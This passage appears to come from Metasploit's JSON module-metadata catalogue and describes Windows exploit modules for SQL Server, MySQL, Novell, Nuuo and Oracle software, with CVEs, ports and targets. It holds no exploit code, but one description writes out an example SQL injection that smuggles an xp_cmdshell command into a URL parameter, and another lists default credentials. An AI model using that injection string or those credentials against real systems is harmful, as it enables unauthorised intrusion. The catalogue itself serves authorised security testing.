"description": "This module can be used to crawl MS SQL Server database links and deploy\n Metasploit payloads through links configured with sysadmin privileges using a\n valid SQL Server Login.\n\n If you are attempting to obtain multiple reverse shells using this module we\n recommend setting the \"DisablePayloadHandler\" advanced option to \"true\", and setting\n up an exploit/multi/handler to run in the background as a job to support multiple incoming\n shells.\n\n If you are interested in deploying payloads to specific servers this module also\n supports that functionality via the \"DEPLOYLIST\" option.\n\n Currently, the module is capable of delivering payloads to both 32bit and 64bit\n Windows systems via powershell memory injection methods based on Matthew Graeber's\n work. As a result, the target server must have powershell installed. By default,\n all of the crawl information is saved to a CSV formatted log file and MSF loot so\n that the tool can also be used for auditing without deploying payloads.",
"references": [
"URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012",
"URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx",
"URL-http://www.exploit-monday.com/2011_10_16_archive.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_linkcrawler",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_payload": {
"name": "Microsoft SQL Server Payload Execution",
"full_name": "exploit/windows/mssql/mssql_payload",
"rank": 600,
"disclosure_date": "2000-05-30",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module executes an arbitrary payload on a Microsoft SQL Server by using\n the \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wscript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.",
"references": [
"CVE-2000-0402",
"OSVDB-557",
"BID-1281",
"CVE-2000-1209",
"OSVDB-15757",
"BID-4797"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/mssql_payload.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_payload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_payload_sqli": {
"name": "Microsoft SQL Server Payload Execution via SQL Injection",
"full_name": "exploit/windows/mssql/mssql_payload_sqli",
"rank": 600,
"disclosure_date": "2000-05-30",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"jduck <jduck@metasploit.com>",
"Rodrigo Marcos"
],
"description": "This module will execute an arbitrary payload on a Microsoft SQL\n Server, using a SQL injection vulnerability.\n\n Once a vulnerability is identified this module\n will use xp_cmdshell to upload and execute Metasploit payloads.\n It is necessary to specify the exact point where the SQL injection\n vulnerability happens. For example, given the following injection:\n\n http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n you would need to set the following path:\n set GET_PATH /show.asp?id=1;[SQLi];--&cat=electrical\n\n In regard to the payload, unless there is an unused (closed) port on the web server host,\n you don't want to use any \"bind\" payload, especially on port 80, as you will\n stop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n your port 80 or to any other outbound port allowed on the firewall.\n For privileged ports execute Metasploit msfconsole as root.\n\n Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wscript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.",
"references": [
"CVE-2000-0402",
"OSVDB-557",
"BID-1281",
"CVE-2000-1209",
"OSVDB-15757",
"BID-4797",
"URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/mssql_payload_sqli.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_payload_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/mysql_mof": {
"name": "Oracle MySQL for Microsoft Windows MOF Execution",
"full_name": "exploit/windows/mysql/mysql_mof",
"rank": 600,
"disclosure_date": "2012-12-01",
"type": "exploit",
"author": [
"kingcope",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers (due to the use of a .mof file).\n This may result in arbitrary code execution under the context of SYSTEM.\n This module requires a valid MySQL account on the target machine.",
"references": [
"CVE-2012-5613",
"OSVDB-88118",
"EDB-23083",
"URL-https://seclists.org/fulldisclosure/2012/Dec/13"
],
"platform": "Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL on Windows prior to Vista"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/mysql/mysql_mof.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_mof",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/mysql_start_up": {
"name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse",
"full_name": "exploit/windows/mysql/mysql_start_up",
"rank": 600,
"disclosure_date": "2012-12-01",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"Sean Verity <veritysr1980@gmail.com>"
],
"description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers. This module abuses the FILE\n privilege to write a payload to Microsoft's All Users Start Up directory\n which will execute every time a user logs in. The default All Users Start\n Up directory used by the module is present on Windows 7.",
"references": [
"CVE-2012-5613",
"OSVDB-88118",
"EDB-23083",
"URL-https://seclists.org/fulldisclosure/2012/Dec/13"
],
"platform": "Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL on Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_start_up",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/mysql_yassl_hello": {
"name": "MySQL yaSSL SSL Hello Message Buffer Overflow",
"full_name": "exploit/windows/mysql/mysql_yassl_hello",
"rank": 200,
"disclosure_date": "2008-01-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0226",
"OSVDB-41195",
"BID-27140"
],
"platform": "Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL 5.0.45-community-nt",
"MySQL 5.1.22-rc-community"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mysql/mysql_yassl_hello.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_yassl_hello",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/scrutinizer_upload_exec": {
"name": "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",
"full_name": "exploit/windows/mysql/scrutinizer_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Jonathan Claudius",
"Tanya Secker",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.\n By default, the software installs a default password in MySQL, and binds the\n service to \"0.0.0.0\". This allows any remote user to log in to MySQL, and then\n gain arbitrary remote code execution under the context of 'SYSTEM'. Examples\n of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.",
"references": [
"CVE-2012-3951",
"OSVDB-84317",
"URL-http://secunia.com/advisories/50074/",
"URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb",
"is_install_path": true,
"ref_name": "windows/mysql/scrutinizer_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/nfs/xlink_nfsd": {
"name": "Omni-NFS Server Buffer Overflow",
"full_name": "exploit/windows/nfs/xlink_nfsd",
"rank": 200,
"disclosure_date": "2006-11-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2.\n When sending a specially crafted NFS packet, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2006-5780",
"OSVDB-30224",
"BID-20941",
"URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm"
],
"platform": "Windows",
"arch": "",
"rport": 2049,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/nfs/xlink_nfsd.rb",
"is_install_path": true,
"ref_name": "windows/nfs/xlink_nfsd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/nntp/ms05_030_nntp": {
"name": "MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",
"full_name": "exploit/windows/nntp/ms05_030_nntp",
"rank": 300,
"disclosure_date": "2005-06-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the news reader of Microsoft\n Outlook Express.",
"references": [
"CVE-2005-1213",
"OSVDB-17306",
"BID-13951",
"MSB-MS05-030"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English SP0-SP4",
"Windows XP English SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/nntp/ms05_030_nntp.rb",
"is_install_path": true,
"ref_name": "windows/nntp/ms05_030_nntp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/file_reporter_fsfui_upload": {
"name": "NFR Agent FSFUI Record File Upload RCE",
"full_name": "exploit/windows/novell/file_reporter_fsfui_upload",
"rank": 500,
"disclosure_date": "2012-11-16",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).",
"references": [
"CVE-2012-4959",
"OSVDB-87573",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "Windows",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb",
"is_install_path": true,
"ref_name": "windows/novell/file_reporter_fsfui_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/groupwisemessenger_client": {
"name": "Novell GroupWise Messenger Client Buffer Overflow",
"full_name": "exploit/windows/novell/groupwisemessenger_client",
"rank": 300,
"disclosure_date": "2008-07-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n By sending a specially crafted HTTP response, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-2703",
"OSVDB-46041",
"BID-29602",
"URL-http://www.infobyte.com.ar/adv/ISR-17.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell GroupWise Messenger 2.0 Client",
"Novell GroupWise Messenger 1.0 Client"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/groupwisemessenger_client.rb",
"is_install_path": true,
"ref_name": "windows/novell/groupwisemessenger_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/netiq_pum_eval": {
"name": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",
"full_name": "exploit/windows/novell/netiq_pum_eval",
"rank": 600,
"disclosure_date": "2012-11-15",
"type": "exploit",
"author": [
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows execution of arbitrary code with SYSTEM privileges.",
"references": [
"CVE-2012-5932",
"OSVDB-87334",
"BID-56539",
"EDB-22738"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/novell/netiq_pum_eval.rb",
"is_install_path": true,
"ref_name": "windows/novell/netiq_pum_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/nmap_stor": {
"name": "Novell NetMail NMAP STOR Buffer Overflow",
"full_name": "exploit/windows/novell/nmap_stor",
"rank": 200,
"disclosure_date": "2006-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2006-6424",
"OSVDB-31363",
"BID-21725"
],
"platform": "Windows",
"arch": "",
"rport": 689,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/nmap_stor.rb",
"is_install_path": true,
"ref_name": "windows/novell/nmap_stor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_desktop_agent": {
"name": "Novell ZENworks 6.5 Desktop/Server Management Overflow",
"full_name": "exploit/windows/novell/zenworks_desktop_agent",
"rank": 400,
"disclosure_date": "2005-05-19",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module exploits a heap overflow in the Novell ZENworks\n Desktop Management agent. This vulnerability was discovered\n by Alex Wheeler.",
"references": [
"CVE-2005-1543",
"OSVDB-16698",
"BID-13678"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_desktop_agent.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_desktop_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op21_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op21_bof",
"rank": 300,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"Stephen Fewer",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x21\n (PROXY_CMD_FTP_FILE) to port 998/TCP. The module has been successfully tested on\n Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).",
"references": [
"CVE-2012-2215",
"OSVDB-65361",
"BID-40486",
"ZDI-10-090",
"URL-http://www.novell.com/support/kb/doc.php?id=7005572"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op21_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op4c_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op4c_bof",
"rank": 300,
"disclosure_date": "2012-02-22",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered\n by sending a specially crafted packet with the opcode 0x4c\n (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. The module has been successfully\n tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server\n 2003 SP2 (DEP bypass).",
"references": [
"CVE-2011-3176",
"OSVDB-80231",
"BID-52659",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2",
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op4c_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op6_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op6_bof",
"rank": 300,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"Stephen Fewer",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x06\n (PROXY_CMD_CLEAR_WS) to port 998/TCP. The module has been successfully tested\n on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).",
"references": [
"OSVDB-65361",
"BID-40486",
"ZDI-10-090",
"URL-http://www.novell.com/support/kb/doc.php?id=7005572"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op6_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op6c_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op6c_bof",
"rank": 300,
"disclosure_date": "2012-02-22",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered by\n sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP)\n to port 998/TCP. The module has been successfully tested on Novell ZENworks\n Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).",
"references": [
"CVE-2011-3175",
"OSVDB-80231",
"BID-52659",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2",
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op6c_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/nuuo/nuuo_cms_fu": {
"name": "Nuuo Central Management Server Authenticated Arbitrary File Upload",
"full_name": "exploit/windows/nuuo/nuuo_cms_fu",
"rank": 0,
"disclosure_date": "2018-10-11",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the\n CMS Server.\n The vulnerability is in the \"FileName\" parameter, which accepts directory traversal (..\\..\\)\n characters. Therefore, this function can be abused to overwrite any files in the installation\n drive of CMS Server.\n\n This vulnerability is exploitable in CMS versions up to and including v2.4.\n\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n\n This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module\n fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will\n not execute successfully.",
"references": [
"CVE-2018-17936",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nuuo Central Management Server <= v2.4.0"
],
"mod_time": "2019-04-23 06:28:57 +0000",
"path": "/modules/exploits/windows/nuuo/nuuo_cms_fu.rb",
"is_install_path": true,
"ref_name": "windows/nuuo/nuuo_cms_fu",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/nuuo/nuuo_cms_sqli": {
"name": "Nuuo Central Management Authenticated SQL Server SQLi",
"full_name": "exploit/windows/nuuo/nuuo_cms_sqli",
"rank": 300,
"disclosure_date": "2018-10-11",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is\n installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.",
"references": [
"CVE-2018-18982",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nuuo Central Management Server <= v2.10.0"
],
"mod_time": "2019-04-23 06:29:51 +0000",
"path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb",
"is_install_path": true,
"ref_name": "windows/nuuo/nuuo_cms_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk"
]
}
},
"exploit_windows/oracle/client_system_analyzer_upload": {
"name": "Oracle Database Client System Analyzer Arbitrary File Upload",
"full_name": "exploit/windows/oracle/client_system_analyzer_upload",
"rank": 600,
"disclosure_date": "2011-01-18",
"type": "exploit",
"author": [
"1c239c43f521145fa8385d64a9c32243",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability on the Client\n Analyzer component as included in Oracle Database 11g, which allows remote\n attackers to upload and execute arbitrary code. This module has been tested\n successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution\n through the Windows Management Instrumentation service has been used.",
"references": [
"CVE-2010-3600",
"OSVDB-70546",
"BID-45883",
"ZDI-11-018",
"URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html"
],
"platform": "Windows",
"arch": "",
"rport": 1158,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/client_system_analyzer_upload.rb",
"is_install_path": true,
"ref_name": "windows/oracle/client_system_analyzer_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/extjob": {
"name": "Oracle Job Scheduler Named Pipe Command Execution",
"full_name": "exploit/windows/oracle/extjob",
"rank": 600,
"disclosure_date": "2007-01-01",
"type": "exploit",
"author": [
"David Litchfield",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job\n Scheduler is implemented via the component extjob.exe which listens on a named pipe\n called \"orcljsex<SID>\" and executes arbitrary commands received over this channel via\n CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.\n Note that the Job Scheduler is disabled in default installations.",
"references": [
"URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/extjob.rb",
"is_install_path": true,
"ref_name": "windows/oracle/extjob",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/osb_ndmp_auth": {
"name": "Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",
"full_name": "exploit/windows/oracle/osb_ndmp_auth",
"rank": 400,
"disclosure_date": "2009-01-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits a stack buffer overflow in Oracle Secure Backup.\n When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-5444",
"OSVDB-51340",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html"
],
"platform": "Windows",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/osb_ndmp_auth.rb",
"is_install_path": true,
"ref_name": "windows/oracle/osb_ndmp_auth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/tns_arguments": {
"name": "Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",
"full_name": "exploit/windows/oracle/tns_arguments",
"rank": 400,
"disclosure_date": "2001-06-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle 8i. When\n sending a specially crafted packet containing an overly long\n ARGUMENTS string to the TNS service, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2001-0499",
"OSVDB-9427",
"BID-2941"
],
"platform": "Windows",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle 8.1.7.0.0 Standard Edition (Windows 2000)",
"Oracle 8.1.7.0.0 Standard Edition (Windows 2003)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/oracle/tns_arguments.rb",
